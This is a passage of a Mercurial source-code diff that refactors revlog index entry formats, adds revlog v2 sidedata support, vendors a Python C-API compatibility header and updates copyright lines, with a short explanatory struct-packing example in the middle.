-nullitem = (0, 0, 0, -1, -1, -1, -1, nullid)
-
-
def gettype(q):
return int(q & 0xFFFF)
@@ -49,6 +43,19 @@
class BaseIndexObject(object):
+ # Format of an index entry according to Python's `struct` language
+ index_format = revlog_constants.INDEX_ENTRY_V1
+ # Size of a C unsigned long long int, platform independent
+ big_int_size = struct.calcsize(b'>Q')
+ # Size of a C long int, platform independent
+ int_size = struct.calcsize(b'>i')
+ # An empty index entry, used as a default value and returned for nullrev
+ null_item = (0, 0, 0, -1, -1, -1, -1, nullid)
+
+ @util.propertycache
+ def entry_size(self):
+ return self.index_format.size
+
@property
def nodemap(self):
msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]"
@@ -94,7 +101,7 @@
def append(self, tup):
if '_nodemap' in vars(self):
self._nodemap[tup[7]] = len(self)
- data = _pack(indexformatng, *tup)
+ data = self.index_format.pack(*tup)
self._extra.append(data)
def _check_index(self, i):
@@ -105,14 +112,14 @@
def __getitem__(self, i):
if i == -1:
- return nullitem
+ return self.null_item
self._check_index(i)
if i >= self._lgt:
data = self._extra[i - self._lgt]
else:
index = self._calculate_index(i)
- data = self._data[index : index + indexsize]
- r = _unpack(indexformatng, data)
+ data = self._data[index : index + self.entry_size]
+ r = self.index_format.unpack(data)
if self._lgt and i == 0:
r = (offset_type(0, gettype(r[0])),) + r[1:]
return r
@@ -120,13 +127,13 @@
class IndexObject(BaseIndexObject):
def __init__(self, data):
- assert len(data) % indexsize == 0
+ assert len(data) % self.entry_size == 0
self._data = data
- self._lgt = len(data) // indexsize
+ self._lgt = len(data) // self.entry_size
self._extra = []
def _calculate_index(self, i):
- return i * indexsize
+ return i * self.entry_size
def __delitem__(self, i):
if not isinstance(i, slice) or not i.stop == -1 or i.step is not None:
@@ -135,7 +142,7 @@
self._check_index(i)
self._stripnodes(i)
if i < self._lgt:
- self._data = self._data[: i * indexsize]
+ self._data = self._data[: i * self.entry_size]
self._lgt = i
self._extra = []
else:
@@ -198,14 +205,16 @@
if lgt is not None:
self._offsets = [0] * lgt
count = 0
- while off <= len(self._data) - indexsize:
+ while off <= len(self._data) - self.entry_size:
+ start = off + self.big_int_size
(s,) = struct.unpack(
- b'>i', self._data[off + indexfirst : off + sizeint + indexfirst]
+ b'>i',
+ self._data[start : start + self.int_size],
)
if lgt is not None:
self._offsets[count] = off
count += 1
- off += indexsize + s
+ off += self.entry_size + s
if off != len(self._data):
raise ValueError(b"corrupted data")
return count
@@ -227,10 +236,68 @@
return self._offsets[i]
-def parse_index2(data, inline):
+def parse_index2(data, inline, revlogv2=False):
if not inline:
- return IndexObject(data), None
- return InlinedIndexObject(data, inline), (0, data)
+ cls = IndexObject2 if revlogv2 else IndexObject
+ return cls(data), None
+ cls = InlinedIndexObject2 if revlogv2 else InlinedIndexObject
+ return cls(data, inline), (0, data)
+
+
+class Index2Mixin(object):
+ index_format = revlog_constants.INDEX_ENTRY_V2
+ null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0)
+
+ def replace_sidedata_info(self, i, sidedata_offset, sidedata_length):
+ """
+ Replace an existing index entry's sidedata offset and length with new
+ ones.
+ This cannot be used outside of the context of sidedata rewriting,
+ inside the transaction that creates the revision `i`.
+ """
+ if i < 0:
+ raise KeyError
+ self._check_index(i)
+ sidedata_format = b">Qi"
+ packed_size = struct.calcsize(sidedata_format)
+ if i >= self._lgt:
+ packed = _pack(sidedata_format, sidedata_offset, sidedata_length)
+ old = self._extra[i - self._lgt]
+ new = old[:64] + packed + old[64 + packed_size :]
+ self._extra[i - self._lgt] = new
+ else:
+ msg = b"cannot rewrite entries outside of this transaction"
+ raise KeyError(msg)
+
+
+class IndexObject2(Index2Mixin, IndexObject):
+ pass
+
+
+class InlinedIndexObject2(Index2Mixin, InlinedIndexObject):
+ def _inline_scan(self, lgt):
+ sidedata_length_pos = 72
+ off = 0
+ if lgt is not None:
+ self._offsets = [0] * lgt
+ count = 0
+ while off <= len(self._data) - self.entry_size:
+ start = off + self.big_int_size
+ (data_size,) = struct.unpack(
+ b'>i',
+ self._data[start : start + self.int_size],
+ )
+ start = off + sidedata_length_pos
+ (side_data_size,) = struct.unpack(
+ b'>i', self._data[start : start + self.int_size]
+ )
+ if lgt is not None:
+ self._offsets[count] = off
+ count += 1
+ off += self.entry_size + data_size + side_data_size
+ if off != len(self._data):
+ raise ValueError(b"corrupted data")
+ return count
def parse_index_devel_nodemap(data, inline):
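
With the format hung off the class, every size computation goes through
`self.entry_size` rather than module globals, and the v2 classes only need to
override `index_format` and `null_item`. The v1 entry layout itself is
unchanged; packing and unpacking one entry looks like this:

    import struct

    # revlog v1 index entry: offset+flags, lengths, base/link revs,
    # parent revs, 20-byte node padded to 32 bytes (INDEX_ENTRY_V1)
    INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x")
    assert INDEX_ENTRY_V1.size == 64

    entry = (0, 11, 25, 0, 0, -1, -1, b"\x99" * 20)
    packed = INDEX_ENTRY_V1.pack(*entry)
    assert len(packed) == INDEX_ENTRY_V1.size
    assert INDEX_ENTRY_V1.unpack(packed) == entry
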
--- a/mercurial/pushkey.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pushkey.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# pushkey.py - dispatching for pushing and pulling keys
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pvec.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pvec.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# pvec.py - probabilistic vector clocks for Mercurial
#
-# Copyright 2012 Matt Mackall <mpm@selenic.com>
+# Copyright 2012 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/mercurial/pythoncapi_compat.h Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,283 @@
+// Header file providing new functions of the Python C API to old Python
+// versions.
+//
+// File distributed under the MIT license.
+//
+// Homepage:
+// https://github.com/pythoncapi/pythoncapi_compat
+//
+// Latest version:
+// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h
+
+#ifndef PYTHONCAPI_COMPAT
+#define PYTHONCAPI_COMPAT
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#include <Python.h>
+#include "frameobject.h" // PyFrameObject, PyFrame_GetBack()
+
+
+/* VC 2008 doesn't know about the inline keyword. */
+#if defined(_MSC_VER) && _MSC_VER < 1900
+#define inline __forceinline
+#endif
+
+// Cast argument to PyObject* type.
+#ifndef _PyObject_CAST
+# define _PyObject_CAST(op) ((PyObject*)(op))
+#endif
+
+
+// bpo-42262 added Py_NewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef)
+static inline PyObject* _Py_NewRef(PyObject *obj)
+{
+ Py_INCREF(obj);
+ return obj;
+}
+#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-42262 added Py_XNewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef)
+static inline PyObject* _Py_XNewRef(PyObject *obj)
+{
+ Py_XINCREF(obj);
+ return obj;
+}
+#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT)
+static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt)
+{
+ ob->ob_refcnt = refcnt;
+}
+#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt)
+#endif
+
+
+// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE)
+static inline void
+_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
+{
+ ob->ob_type = type;
+}
+#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
+#endif
+
+
+// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE)
+static inline void
+_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size)
+{
+ ob->ob_size = size;
+}
+#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size)
+#endif
+
+
+// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyCodeObject*
+PyFrame_GetCode(PyFrameObject *frame)
+{
+ PyCodeObject *code;
+ assert(frame != NULL);
+ code = frame->f_code;
+ assert(code != NULL);
+ Py_INCREF(code);
+ return code;
+}
+#endif
+
+static inline PyCodeObject*
+_PyFrame_GetCodeBorrow(PyFrameObject *frame)
+{
+ PyCodeObject *code = PyFrame_GetCode(frame);
+ Py_DECREF(code);
+ return code; // borrowed reference
+}
+
+
+// bpo-40421 added PyFrame_GetBack() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyFrame_GetBack(PyFrameObject *frame)
+{
+ PyFrameObject *back;
+ assert(frame != NULL);
+ back = frame->f_back;
+ Py_XINCREF(back);
+ return back;
+}
+#endif
+
+static inline PyFrameObject*
+_PyFrame_GetBackBorrow(PyFrameObject *frame)
+{
+ PyFrameObject *back = PyFrame_GetBack(frame);
+ Py_XDECREF(back);
+ return back; // borrowed reference
+}
+
+
+// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyThreadState_GetInterpreter(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->interp;
+}
+#endif
+
+
+// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyThreadState_GetFrame(PyThreadState *tstate)
+{
+ PyFrameObject *frame;
+ assert(tstate != NULL);
+ frame = tstate->frame;
+ Py_XINCREF(frame);
+ return frame;
+}
+#endif
+
+static inline PyFrameObject*
+_PyThreadState_GetFrameBorrow(PyThreadState *tstate)
+{
+ PyFrameObject *frame = PyThreadState_GetFrame(tstate);
+ Py_XDECREF(frame);
+ return frame; // borrowed reference
+}
+
+
+// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyInterpreterState_Get(void)
+{
+ PyThreadState *tstate;
+ PyInterpreterState *interp;
+
+ tstate = PyThreadState_GET();
+ if (tstate == NULL) {
+ Py_FatalError("GIL released (tstate is NULL)");
+ }
+ interp = tstate->interp;
+ if (interp == NULL) {
+ Py_FatalError("no current interpreter");
+ }
+ return interp;
+}
+#endif
+
+
+// bpo-39947 added PyThreadState_GetID() to Python 3.9.0a6
+#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6
+static inline uint64_t
+PyThreadState_GetID(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->id;
+}
+#endif
+
+
+// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1
+#if PY_VERSION_HEX < 0x030900A1
+static inline PyObject*
+PyObject_CallNoArgs(PyObject *func)
+{
+ return PyObject_CallFunctionObjArgs(func, NULL);
+}
+#endif
+
+
+// bpo-39245 made PyObject_CallOneArg() public (previously called
+// _PyObject_CallOneArg) in Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4
+static inline PyObject*
+PyObject_CallOneArg(PyObject *func, PyObject *arg)
+{
+ return PyObject_CallFunctionObjArgs(func, arg, NULL);
+}
+#endif
+
+
+// bpo-40024 added PyModule_AddType() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline int
+PyModule_AddType(PyObject *module, PyTypeObject *type)
+{
+ const char *name, *dot;
+
+ if (PyType_Ready(type) < 0) {
+ return -1;
+ }
+
+ // inline _PyType_Name()
+ name = type->tp_name;
+ assert(name != NULL);
+ dot = strrchr(name, '.');
+ if (dot != NULL) {
+ name = dot + 1;
+ }
+
+ Py_INCREF(type);
+ if (PyModule_AddObject(module, name, (PyObject *)type) < 0) {
+ Py_DECREF(type);
+ return -1;
+ }
+
+ return 0;
+}
+#endif
+
+
+// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6.
+// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2.
+#if PY_VERSION_HEX < 0x030900A6
+static inline int
+PyObject_GC_IsTracked(PyObject* obj)
+{
+ return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj));
+}
+#endif
+
+// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6.
+// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final.
+#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0
+static inline int
+PyObject_GC_IsFinalized(PyObject *obj)
+{
+ return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1));
+}
+#endif
+
+
+// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE)
+static inline int
+_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) {
+ return ob->ob_type == type;
+}
+#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type)
+#endif
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif // PYTHONCAPI_COMPAT
--- a/mercurial/repair.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/repair.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# repair.py - functions for repository repair for mercurial
#
# Copyright 2005, 2006 Chris Mason <mason@suse.com>
-# Copyright 2007 Matt Mackall
+# Copyright 2007 Olivia Mackall
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -28,11 +28,11 @@
pycompat,
requirements,
scmutil,
- util,
)
from .utils import (
hashutil,
stringutil,
+ urlutil,
)
@@ -245,7 +245,7 @@
tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile)
txnname = b'strip'
if not isinstance(gen, bundle2.unbundle20):
- txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl)
+ txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl)
with repo.transaction(txnname) as tr:
bundle2.applybundle(
repo, gen, tr, source=b'strip', url=tmpbundleurl
@@ -308,11 +308,12 @@
if not tostrip:
return None
- newbmtarget, updatebm = _bookmarkmovements(repo, tostrip)
+ backupfile = None
if backup:
node = tostrip[0]
backupfile = _createstripbackup(repo, tostrip, node, topic)
+ newbmtarget, updatebm = _bookmarkmovements(repo, tostrip)
with repo.transaction(b'strip') as tr:
phases.retractboundary(repo, tr, phases.archived, tostrip)
bmchanges = [(m, repo[newbmtarget].node()) for m in updatebm]
@@ -427,7 +428,7 @@
if scmutil.istreemanifest(repo):
# This logic is safe if treemanifest isn't enabled, but also
# pointless, so we skip it if treemanifest isn't enabled.
- for unencoded, encoded, size in repo.store.datafiles():
+ for t, unencoded, encoded, size in repo.store.datafiles():
if unencoded.startswith(b'meta/') and unencoded.endswith(
b'00manifest.i'
):
@@ -442,7 +443,7 @@
"""
repo = repo.unfiltered()
- if b'fncache' not in repo.requirements:
+ if requirements.FNCACHE_REQUIREMENT not in repo.requirements:
ui.warn(
_(
b'(not rebuilding fncache because repository does not '
--- a/mercurial/requirements.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/requirements.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,17 @@
# requirements.py - objects and functions related to repository requirements
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
+GENERALDELTA_REQUIREMENT = b'generaldelta'
+DOTENCODE_REQUIREMENT = b'dotencode'
+STORE_REQUIREMENT = b'store'
+FNCACHE_REQUIREMENT = b'fncache'
+
# When narrowing is finalized and no longer subject to format changes,
# we should move this to just "narrow" or similar.
NARROW_REQUIREMENT = b'narrowhg-experimental'
@@ -21,9 +26,11 @@
# Stores manifest in Tree structure
TREEMANIFEST_REQUIREMENT = b'treemanifest'
+REVLOGV1_REQUIREMENT = b'revlogv1'
+
# Increment the sub-version when the revlog v2 format changes to lock out old
# clients.
-REVLOGV2_REQUIREMENT = b'exp-revlogv2.1'
+REVLOGV2_REQUIREMENT = b'exp-revlogv2.2'
# A repository with the sparserevlog feature will have delta chains that
# can spread over a larger span. Sparse reading cuts these large spans into
--- a/mercurial/revlog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlog.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revlog.py - storage back-end for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -13,6 +13,7 @@
from __future__ import absolute_import
+import binascii
import collections
import contextlib
import errno
@@ -28,6 +29,7 @@
nullhex,
nullid,
nullrev,
+ sha1nodeconstants,
short,
wdirfilenodeids,
wdirhex,
@@ -39,6 +41,10 @@
from .revlogutils.constants import (
FLAG_GENERALDELTA,
FLAG_INLINE_DATA,
+ INDEX_ENTRY_V0,
+ INDEX_ENTRY_V1,
+ INDEX_ENTRY_V2,
+ INDEX_HEADER,
REVLOGV0,
REVLOGV1,
REVLOGV1_FLAGS,
@@ -119,10 +125,10 @@
# Flag processors for REVIDX_ELLIPSIS.
def ellipsisreadprocessor(rl, text):
- return text, False, {}
-
-
-def ellipsiswriteprocessor(rl, text, sidedata):
+ return text, False
+
+
+def ellipsiswriteprocessor(rl, text):
return text, False
@@ -203,6 +209,7 @@
baserevisionsize = attr.ib()
revision = attr.ib()
delta = attr.ib()
+ sidedata = attr.ib()
linknode = attr.ib(default=None)
@@ -214,20 +221,9 @@
node = attr.ib(default=None)
-# index v0:
-# 4 bytes: offset
-# 4 bytes: compressed length
-# 4 bytes: base rev
-# 4 bytes: link rev
-# 20 bytes: parent 1 nodeid
-# 20 bytes: parent 2 nodeid
-# 20 bytes: nodeid
-indexformatv0 = struct.Struct(b">4l20s20s20s")
-indexformatv0_pack = indexformatv0.pack
-indexformatv0_unpack = indexformatv0.unpack
-
-
class revlogoldindex(list):
+ entry_size = INDEX_ENTRY_V0.size
+
@property
def nodemap(self):
msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]"
@@ -279,11 +275,8 @@
class revlogoldio(object):
- def __init__(self):
- self.size = indexformatv0.size
-
def parseindex(self, data, inline):
- s = self.size
+ s = INDEX_ENTRY_V0.size
index = []
nodemap = nodemaputil.NodeMap({nullid: nullrev})
n = off = 0
@@ -291,7 +284,7 @@
while off + s <= l:
cur = data[off : off + s]
off += s
- e = indexformatv0_unpack(cur)
+ e = INDEX_ENTRY_V0.unpack(cur)
# transform to revlogv1 format
e2 = (
offset_type(e[0], 0),
@@ -311,6 +304,13 @@
return index, None
def packentry(self, entry, node, version, rev):
+ """return the binary representation of an entry
+
+ entry: a tuple containing all the values (see index.__getitem__)
+ node: a callback to convert a revision to nodeid
+ version: the changelog version
+ rev: the revision number
+ """
if gettype(entry[0]):
raise error.RevlogError(
_(b'index entry flags need revlog version 1')
@@ -324,24 +324,8 @@
node(entry[6]),
entry[7],
)
- return indexformatv0_pack(*e2)
-
-
-# index ng:
-# 6 bytes: offset
-# 2 bytes: flags
-# 4 bytes: compressed length
-# 4 bytes: uncompressed length
-# 4 bytes: base rev
-# 4 bytes: link rev
-# 4 bytes: parent 1 rev
-# 4 bytes: parent 2 rev
-# 32 bytes: nodeid
-indexformatng = struct.Struct(b">Qiiiiii20s12x")
-indexformatng_pack = indexformatng.pack
-versionformat = struct.Struct(b">I")
-versionformat_pack = versionformat.pack
-versionformat_unpack = versionformat.unpack
+ return INDEX_ENTRY_V0.pack(*e2)
+
# corresponds to uncompressed length of indexformatng (2 gigs, 4-byte
# signed integer)
@@ -349,18 +333,27 @@
class revlogio(object):
- def __init__(self):
- self.size = indexformatng.size
-
def parseindex(self, data, inline):
# call the C implementation to parse the index data
index, cache = parsers.parse_index2(data, inline)
return index, cache
def packentry(self, entry, node, version, rev):
- p = indexformatng_pack(*entry)
+ p = INDEX_ENTRY_V1.pack(*entry)
if rev == 0:
- p = versionformat_pack(version) + p[4:]
+ p = INDEX_HEADER.pack(version) + p[4:]
+ return p
+
+
+class revlogv2io(object):
+ def parseindex(self, data, inline):
+ index, cache = parsers.parse_index2(data, inline, revlogv2=True)
+ return index, cache
+
+ def packentry(self, entry, node, version, rev):
+ p = INDEX_ENTRY_V2.pack(*entry)
+ if rev == 0:
+ p = INDEX_HEADER.pack(version) + p[4:]
return p
@@ -421,6 +414,11 @@
If `upperboundcomp` is not None, this is the expected maximal gain from
compression for the data content.
+
+ `concurrencychecker` is an optional function that receives 3 arguments: a
+ file handle, a filename, and an expected position. It should check whether
+ the current position in the file handle is valid, and log/warn/fail (by
+ raising).
"""
_flagserrorclass = error.RevlogError
@@ -435,6 +433,7 @@
censorable=False,
upperboundcomp=None,
persistentnodemap=False,
+ concurrencychecker=None,
):
"""
create a revlog object
@@ -448,14 +447,9 @@
self.datafile = datafile or (indexfile[:-2] + b".d")
self.nodemap_file = None
if persistentnodemap:
- if indexfile.endswith(b'.a'):
- pending_path = indexfile[:-4] + b".n.a"
- if opener.exists(pending_path):
- self.nodemap_file = pending_path
- else:
- self.nodemap_file = indexfile[:-4] + b".n"
- else:
- self.nodemap_file = indexfile[:-2] + b".n"
+ self.nodemap_file = nodemaputil.get_nodemap_file(
+ opener, self.indexfile
+ )
self.opener = opener
# When True, indexfile is opened with checkambig=True at writing, to
@@ -495,6 +489,8 @@
self._loadindex()
+ self._concurrencychecker = concurrencychecker
+
def _loadindex(self):
mmapindexthreshold = None
opts = self.opener.options
@@ -531,8 +527,6 @@
if self._mmaplargeindex and b'mmapindexthreshold' in opts:
mmapindexthreshold = opts[b'mmapindexthreshold']
self.hassidedata = bool(opts.get(b'side-data', False))
- if self.hassidedata:
- self._flagprocessors[REVIDX_SIDEDATA] = sidedatautil.processors
self._sparserevlog = bool(opts.get(b'sparse-revlog', False))
withsparseread = bool(opts.get(b'with-sparse-read', False))
# sparse-revlog forces sparse-read
@@ -575,7 +569,7 @@
else:
indexdata = f.read()
if len(indexdata) > 0:
- versionflags = versionformat_unpack(indexdata[:4])[0]
+ versionflags = INDEX_HEADER.unpack(indexdata[:4])[0]
self._initempty = False
else:
versionflags = newversionflags
@@ -617,7 +611,11 @@
% (flags >> 16, fmt, self.indexfile)
)
- self._inline = versionflags & FLAG_INLINE_DATA
+ # There is a bug in the transaction handling when going from an
+ # inline revlog to a separate index and data file. Turn it off until
+ # it's fixed, since v2 revlogs sometimes get rewritten on exchange.
+ # See issue6485
+ self._inline = False
# generaldelta implied by version 2 revlogs.
self._generaldelta = True
@@ -625,6 +623,10 @@
raise error.RevlogError(
_(b'unknown version (%d) in revlog %s') % (fmt, self.indexfile)
)
+
+ self.nodeconstants = sha1nodeconstants
+ self.nullid = self.nodeconstants.nullid
+
# sparse-revlog can't be on without general-delta (issue6056)
if not self._generaldelta:
self._sparserevlog = False
@@ -647,6 +649,8 @@
self._io = revlogio()
if self.version == REVLOGV0:
self._io = revlogoldio()
+ elif fmt == REVLOGV2:
+ self._io = revlogv2io()
elif devel_nodemap:
self._io = NodemapRevlogIO()
elif use_rust_index:
@@ -831,6 +835,11 @@
def length(self, rev):
return self.index[rev][1]
+ def sidedata_length(self, rev):
+ if self.version & 0xFFFF != REVLOGV2:
+ return 0
+ return self.index[rev][9]
+
def rawsize(self, rev):
"""return the length of the uncompressed text for a given revision"""
l = self.index[rev][2]
@@ -875,8 +884,10 @@
if rev == wdirrev:
raise error.WdirUnsupported
raise
-
- return entry[5], entry[6]
+ if entry[5] == nullrev:
+ return entry[6], entry[5]
+ else:
+ return entry[5], entry[6]
# fast parentrevs(rev) where rev isn't filtered
_uncheckedparentrevs = parentrevs
@@ -897,7 +908,11 @@
def parents(self, node):
i = self.index
d = i[self.rev(node)]
- return i[d[5]][7], i[d[6]][7] # map revisions to nodes inline
+ # inline node() to avoid function call overhead
+ if d[5] == nullrev:
+ return i[d[6]][7], i[d[5]][7]
+ else:
+ return i[d[5]][7], i[d[6]][7]
def chainlen(self, rev):
return self._chaininfo(rev)[0]
@@ -1694,8 +1709,8 @@
end = int(iend[0] >> 16) + iend[1]
if self._inline:
- start += (startrev + 1) * self._io.size
- end += (endrev + 1) * self._io.size
+ start += (startrev + 1) * self.index.entry_size
+ end += (endrev + 1) * self.index.entry_size
length = end - start
return start, self._getsegment(start, length, df=df)
@@ -1729,7 +1744,7 @@
start = self.start
length = self.length
inline = self._inline
- iosize = self._io.size
+ iosize = self.index.entry_size
buffer = util.buffer
l = []
@@ -1828,7 +1843,7 @@
elif operation == b'read':
return flagutil.processflagsread(self, text, flags)
else: # write operation
- return flagutil.processflagswrite(self, text, flags, None)
+ return flagutil.processflagswrite(self, text, flags)
def revision(self, nodeorrev, _df=None, raw=False):
"""return an uncompressed revision of a given node or revision
@@ -1873,10 +1888,17 @@
# revision or might need to be processed to retrieve the revision.
rev, rawtext, validated = self._rawtext(node, rev, _df=_df)
+ if self.version & 0xFFFF == REVLOGV2:
+ if rev is None:
+ rev = self.rev(node)
+ sidedata = self._sidedata(rev)
+ else:
+ sidedata = {}
+
if raw and validated:
# if we don't want to process the raw text and that raw
# text is cached, we can exit early.
- return rawtext, {}
+ return rawtext, sidedata
if rev is None:
rev = self.rev(node)
# the revlog's flag for this revision
@@ -1885,20 +1907,14 @@
if validated and flags == REVIDX_DEFAULT_FLAGS:
# no extra flags set, no flag processor runs, text = rawtext
- return rawtext, {}
-
- sidedata = {}
+ return rawtext, sidedata
+
if raw:
validatehash = flagutil.processflagsraw(self, rawtext, flags)
text = rawtext
else:
- try:
- r = flagutil.processflagsread(self, rawtext, flags)
- except error.SidedataHashError as exc:
- msg = _(b"integrity check failed on %s:%s sidedata key %d")
- msg %= (self.indexfile, pycompat.bytestr(rev), exc.sidedatakey)
- raise error.RevlogError(msg)
- text, validatehash, sidedata = r
+ r = flagutil.processflagsread(self, rawtext, flags)
+ text, validatehash = r
if validatehash:
self.checkhash(text, node, rev=rev)
if not validated:
@@ -1949,6 +1965,21 @@
del basetext # let us have a chance to free memory early
return (rev, rawtext, False)
+ def _sidedata(self, rev):
+ """Return the sidedata for a given revision number."""
+ index_entry = self.index[rev]
+ sidedata_offset = index_entry[8]
+ sidedata_size = index_entry[9]
+
+ if self._inline:
+ sidedata_offset += self.index.entry_size * (1 + rev)
+ if sidedata_size == 0:
+ return {}
+
+ segment = self._getsegment(sidedata_offset, sidedata_size)
+ sidedata = sidedatautil.deserialize_sidedata(segment)
+ return sidedata
+
def rawdata(self, nodeorrev, _df=None):
"""return an uncompressed raw data of a given node or revision number.
@@ -2041,7 +2072,7 @@
# the temp file replace the real index when we exit the context
# manager
- tr.replace(self.indexfile, trindex * self._io.size)
+ tr.replace(self.indexfile, trindex * self.index.entry_size)
nodemaputil.setup_persistent_nodemap(tr, self)
self._chunkclear()
@@ -2082,20 +2113,15 @@
if sidedata is None:
sidedata = {}
- flags = flags & ~REVIDX_SIDEDATA
elif not self.hassidedata:
raise error.ProgrammingError(
_(b"trying to add sidedata to a revlog who don't support them")
)
- else:
- flags |= REVIDX_SIDEDATA
if flags:
node = node or self.hash(text, p1, p2)
- rawtext, validatehash = flagutil.processflagswrite(
- self, text, flags, sidedata=sidedata
- )
+ rawtext, validatehash = flagutil.processflagswrite(self, text, flags)
# If the flag processor modifies the revision data, ignore any provided
# cachedelta.
@@ -2111,8 +2137,9 @@
)
node = node or self.hash(rawtext, p1, p2)
- if self.index.has_node(node):
- return node
+ rev = self.index.get_rev(node)
+ if rev is not None:
+ return rev
if validatehash:
self.checkhash(rawtext, node, p1=p1, p2=p2)
@@ -2127,6 +2154,7 @@
flags,
cachedelta=cachedelta,
deltacomputer=deltacomputer,
+ sidedata=sidedata,
)
def addrawrevision(
@@ -2140,6 +2168,7 @@
flags,
cachedelta=None,
deltacomputer=None,
+ sidedata=None,
):
"""add a raw revision with known flags, node and parents
useful when reusing a revision not stored in this revlog (ex: received
@@ -2162,6 +2191,7 @@
ifh,
dfh,
deltacomputer=deltacomputer,
+ sidedata=sidedata,
)
finally:
if dfh:
@@ -2237,7 +2267,9 @@
compressor = engine.revlogcompressor(self._compengineopts)
self._decompressors[t] = compressor
except KeyError:
- raise error.RevlogError(_(b'unknown compression type %r') % t)
+ raise error.RevlogError(
+ _(b'unknown compression type %s') % binascii.hexlify(t)
+ )
return compressor.decompress(data)
@@ -2255,6 +2287,7 @@
dfh,
alwayscache=False,
deltacomputer=None,
+ sidedata=None,
):
"""internal function to add revisions to the log
@@ -2287,7 +2320,23 @@
curr = len(self)
prev = curr - 1
- offset = self.end(prev)
+
+ offset = self._get_data_offset(prev)
+
+ if self._concurrencychecker:
+ if self._inline:
+ # offset is "as if" it were in the .d file, so we need to add on
+ # the size of the entry metadata.
+ self._concurrencychecker(
